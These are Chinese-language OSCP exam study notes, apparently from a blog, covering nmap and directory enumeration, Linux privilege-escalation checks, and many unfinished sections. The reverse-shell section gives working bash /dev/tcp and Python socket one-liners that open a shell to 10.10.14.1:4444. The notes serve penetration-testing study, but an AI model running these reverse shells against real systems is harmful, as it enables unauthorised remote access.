OSCP 学习笔记

OSCP 备考过程中的重要知识点总结。

持续更新中...

🔍 信息收集

端口扫描

bash

# 快速扫描常用端口
nmap -sV -sC -oN nmap/initial $IP

# 全端口扫描
nmap -p- -oN nmap/all-ports $IP

# UDP 扫描（慢，但重要）
sudo nmap -sU --top-ports 100 $IP

目录枚举

bash

# Gobuster
gobuster dir -u http://$IP -w /usr/share/wordlists/dirb/common.txt -x php,html,txt

# Feroxbuster (更快)
feroxbuster -u http://$IP -w /usr/share/wordlists/dirb/common.txt -x php html txt

🌐 Web 应用攻击

SQL 注入

待补充...

文件包含（LFI/RFI）

待补充...

文件上传

待补充...

🚀 Reverse Shell

Linux

bash

# Bash
bash -i >& /dev/tcp/10.10.14.1/4444 0>&1

# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Windows

待补充...

⬆️ Linux 权限提升

SUID 二进制文件

bash

# 查找 SUID 文件
find / -perm -4000 -type f 2>/dev/null

# GTFOBins 查询利用方法
# https://gtfobins.github.io/

SUDO 配置

bash

# 查看 sudo 权限
sudo -l

# 利用 sudo 提权
# 参考 GTFOBins

Cron 任务

bash

# 查看 cron 任务
cat /etc/crontab
ls -la /etc/cron.*

⬆️ Windows 权限提升

服务配置错误

待补充...

注册表提权

待补充...

🔐 Active Directory

域枚举

待补充...

Kerberoasting

待补充...

横向移动

待补充...

持续更新中，更多内容正在整理...

OSCP 学习笔记 ​

🔍 信息收集 ​

端口扫描 ​

目录枚举 ​

🌐 Web 应用攻击 ​

SQL 注入 ​

文件包含（LFI/RFI） ​

文件上传 ​

🚀 Reverse Shell ​

Linux ​

Windows ​

⬆️ Linux 权限提升 ​

SUID 二进制文件 ​

SUDO 配置 ​

Cron 任务 ​

⬆️ Windows 权限提升 ​

服务配置错误 ​

注册表提权 ​

🔐 Active Directory ​

域枚举 ​

Kerberoasting ​

横向移动 ​

OSCP 学习笔记

🔍 信息收集

端口扫描

目录枚举

🌐 Web 应用攻击

SQL 注入

文件包含（LFI/RFI）

文件上传

🚀 Reverse Shell

Linux

Windows

⬆️ Linux 权限提升

SUID 二进制文件

SUDO 配置

Cron 任务

⬆️ Windows 权限提升

服务配置错误

注册表提权

🔐 Active Directory

域枚举

Kerberoasting

横向移动